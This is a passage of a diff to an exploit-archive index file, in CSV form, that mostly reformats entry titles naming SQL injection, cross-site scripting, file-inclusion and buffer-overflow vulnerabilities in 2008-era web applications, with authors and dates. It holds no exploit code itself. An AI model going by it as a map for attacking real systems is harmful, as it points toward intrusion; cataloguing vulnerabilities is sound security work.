Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 - 'connexion.php' Remote File Include Vulnerability",2008-03-31,ZoRLu,php,webapps,0 +31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection Vulnerability",2008-03-31,RMx,asp,webapps,0 +31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure Vulnerability",2008-03-31,"Alexander Klink",windows,remote,0 +31584,platforms/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Include Vulnerability",2008-04-01,"Joseph Giron",php,webapps,0 +31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/VISTA/2000/2003/2008 - Kernel Usermode Callback Local Privilege Escalation Vulnerability (1)",2008-04-08,Whitecell,windows,dos,0 +31587,platforms/php/webapps/31587.txt,"EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31589,platforms/php/webapps/31589.txt,"EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 +31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal Vulnerability",2008-04-02,"Luigi Auriemma",linux,remote,0 +31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 +31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 +31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 +31595,platforms/php/webapps/31595.txt,"Joomla! and Mambo Joomlearn LMS Component - 'cat' Parameter SQL Injection Vulnerability",2008-04-03,The-0utl4w,php,webapps,0 +31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - index.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 - stats.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 - detail.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31601,platforms/php/webapps/31601.txt,"mcGallery 1.1 - resize.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31602,platforms/php/webapps/31602.txt,"mcGallery 1.1 - show.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 +31603,platforms/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger - Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0 +31604,platforms/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0 +31605,platforms/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,php,webapps,0 +31606,platforms/php/webapps/31606.txt,"Glossaire 2.0 - 'glossaire.php' Cross-Site Scripting Vulnerability",2008-04-04,ZoRLu,php,webapps,0 +31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial Of Service Vulnerability",2008-04-04,ryujin,windows,dos,0 +31608,platforms/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module - 'VIEW' Parameter Cross-Site Scripting Vulnerability",2008-04-04,"H-T Team",php,webapps,0 +31609,platforms/php/webapps/31609.txt,"Nuke ET 3.4 - 'mensaje' Parameter HTML Injection Vulnerability",2008-04-04,"Jose Luis Zayas",php,webapps,0 +31610,platforms/php/webapps/31610.txt,"RobotStats 0.1 - graph.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 +31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 - robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 +31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Parameter Integer Overflow Vulnerability",2008-04-21,"Core Security Technologies",osx,remote,0 +31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting Vulnerability",2008-04-04,Y433r,php,webapps,0 +31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 +31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0 31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/hardware/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,hardware,webapps,0 -31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0 -31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0 -31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0 -31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0 -31623,platforms/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps,0 -31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 Header Handling 'res://' Information Disclosure Vulnerability",2008-04-07,"The Hacker Webzine",windows,remote,0 -31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 -31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 -31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 File Descriptor Remote Denial of Service Vulnerability",2008-04-08,"Milen Rangelov",unix,dos,0 -31628,platforms/php/webapps/31628.txt,"Swiki 1.5 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0 -31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x 'ovspmd' Buffer Overflow Vulnerability",2008-04-08,"Luigi Auriemma",windows,dos,0 -31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Vulnerability",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 -31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 'gid' Parameter SQL Injection Vulnerability",2008-04-09,MantiS,php,webapps,0 +31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0 +31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0 +31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0 +31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0 +31623,platforms/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps,0 +31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 - Header Handling 'res://' Information Disclosure Vulnerability",2008-04-07,"The Hacker Webzine",windows,remote,0 +31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 +31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 +31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service Vulnerability",2008-04-08,"Milen Rangelov",unix,dos,0 +31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0 +31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow Vulnerability",2008-04-08,"Luigi Auriemma",windows,dos,0 +31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Vulnerability",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 +31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection Vulnerability",2008-04-09,MantiS,php,webapps,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection Vulnerability",2008-04-09,OneIdBeagl3,windows,remote,0 -31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon 'functions_portal.php' Remote File Include Vulnerability",2008-04-09,bd0rk,php,webapps,0 -31634,platforms/unix/remote/31634.py,"Python zlib Module Remote Buffer Overflow Vulnerability",2008-04-09,"Justin Ferguson",unix,remote,0 -31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 IMAP Login Data Handling Denial Of Service Vulnerability",2008-04-10,ryujin,windows,dos,0 -31636,platforms/php/webapps/31636.txt,"W2B phpHotResources 'cat.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0 -31637,platforms/php/webapps/31637.txt,"W2B Dating Club 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0 -31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 -31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0 -31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0 -31641,platforms/java/webapps/31641.txt,"Business Objects Infoview 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0 -31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder PLS Buffer Overflow",2014-02-13,metasploit,windows,local,0 -31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 CznCustomContainer.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 home.asp CFTARGET Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include Vulnerability",2008-04-09,bd0rk,php,webapps,0 +31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow Vulnerability",2008-04-09,"Justin Ferguson",unix,remote,0 +31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service Vulnerability",2008-04-10,ryujin,windows,dos,0 +31636,platforms/php/webapps/31636.txt,"W2B phpHotResources - 'cat.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0 +31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0 +31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 +31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0 +31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0 +31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0 +31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0 +31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - CznCustomContainer.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - home.asp CFTARGET Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31647,platforms/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",multiple,webapps,0 -31648,platforms/asp/webapps/31648.txt,"Cezanne 7 CFLookup.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31649,platforms/asp/webapps/31649.txt,"Cezanne 7 CznCommon/CznCustomContainer.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 'CFLogon.asp' Cross-Site Scripting Vulnerability",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 -31651,platforms/php/webapps/31651.txt,"amfphp 1.2 browser/methodTable.php class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31652,platforms/php/webapps/31652.txt,"amfphp 1.2 browser/code.php Multiple Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31653,platforms/php/webapps/31653.txt,"amfphp 1.2 browser/details class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31654,platforms/php/webapps/31654.txt,"W2B Online Banking 'ilang' Parameter Remote File Include Vulnerability",2008-04-15,THuM4N,php,webapps,0 -31655,platforms/php/webapps/31655.txt,"Istant-Replay 'read.php' Remote File Include Vulnerability",2008-04-15,THuGM4N,php,webapps,0 -31656,platforms/windows/dos/31656.txt,"ICQ 6 'Personal Status Manager' Remote Buffer Overflow Vulnerability",2008-04-16,"Leon Juranic",windows,dos,0 -31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 'bs_auth.php' Cross Site Scripting Vulnerability",2008-04-16,ZoRLu,php,webapps,0 -31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 'rep.php' Cross-Site Scripting Vulnerability",2008-04-17,ZoRLu,php,webapps,0 -31659,platforms/php/webapps/31659.txt,"Php-Stats 0.1.9.1 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0 -31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 add_groupe.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 contacts.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 groupes.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 importer.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 login.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 search.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 -31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 'adminler.asp' SQL Injection Vulnerability",2008-04-17,U238,asp,webapps,0 -31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege Local Privilege Escalation Vulnerability",2008-04-17,"Cesar Cerrudo",windows,local,0 -31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0 -31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 'wiki' Parameter Cross-Site Scripting Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0 -31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0 -31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,multiple,webapps,0 -31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 'detail.php' SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0 -31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0 -31676,platforms/php/webapps/31676.txt,"Host Directory PRO Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0 -31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0 -31678,platforms/php/webapps/31678.txt,"SMF <= 1.1.4 Audio CAPTCHA Security Bypass Vulnerability",2008-04-21,"Michael Brooks",php,webapps,0 -31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0 -31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0 -31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 -31683,platforms/hardware/remote/31683.php,"Linksys E-series Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 +31648,platforms/asp/webapps/31648.txt,"Cezanne 7 - CFLookup.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31649,platforms/asp/webapps/31649.txt,"Cezanne 7 - CznCommon/CznCustomContainer.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting Vulnerability",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 +31651,platforms/php/webapps/31651.txt,"amfphp 1.2 - browser/methodTable.php class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31652,platforms/php/webapps/31652.txt,"amfphp 1.2 - browser/code.php Multiple Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31653,platforms/php/webapps/31653.txt,"amfphp 1.2 - browser/details class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Include Vulnerability",2008-04-15,THuM4N,php,webapps,0 +31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Include Vulnerability",2008-04-15,THuGM4N,php,webapps,0 +31656,platforms/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow Vulnerability",2008-04-16,"Leon Juranic",windows,dos,0 +31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross Site Scripting Vulnerability",2008-04-16,ZoRLu,php,webapps,0 +31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting Vulnerability",2008-04-17,ZoRLu,php,webapps,0 +31659,platforms/php/webapps/31659.txt,"Php-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0 +31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 - contacts.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 - groupes.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - login.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0 +31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection Vulnerability",2008-04-17,U238,asp,webapps,0 +31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege - Local Privilege Escalation Vulnerability",2008-04-17,"Cesar Cerrudo",windows,local,0 +31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0 +31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 - 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0 +31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 - Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0 +31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,multiple,webapps,0 +31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0 +31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0 +31676,platforms/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0 +31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0 +31678,platforms/php/webapps/31678.txt,"SMF <= 1.1.4 - Audio CAPTCHA Security Bypass Vulnerability",2008-04-21,"Michael Brooks",php,webapps,0 +31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0 +31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0 +31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 +31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 @@ -28487,211 +28487,246 @@ id,file,description,date,author,platform,type,port 31691,platforms/hardware/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include Vulnerability",2014-02-16,Vulnerability-Lab,hardware,webapps,8080 31692,platforms/hardware/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080 31693,platforms/hardware/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,hardware,webapps,8080 -31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service UID - Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 -31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) SQL Injection",2014-02-16,metasploit,php,remote,0 +31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID - Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 +31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,metasploit,php,remote,0 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service Vulnerability",2008-04-22,"Luigi Auriemma",windows,dos,0 -31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0 -31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 -31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0 -31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 -31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 -31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module Arbitrary File Upload Vulnerability",2008-04-24,ZoRLu,php,webapps,0 -31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog 'list_article.php' Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 -31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0 -31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 upload/install/index.php step Parameter XSS",2008-04-24,ZoRLu,php,webapps,0 -31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 URI Handler Command Execution Vulnerability",2008-04-24,"Thomas Pollet",unix,remote,0 +31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0 +31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' - Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 +31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0 +31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 +31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 +31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload 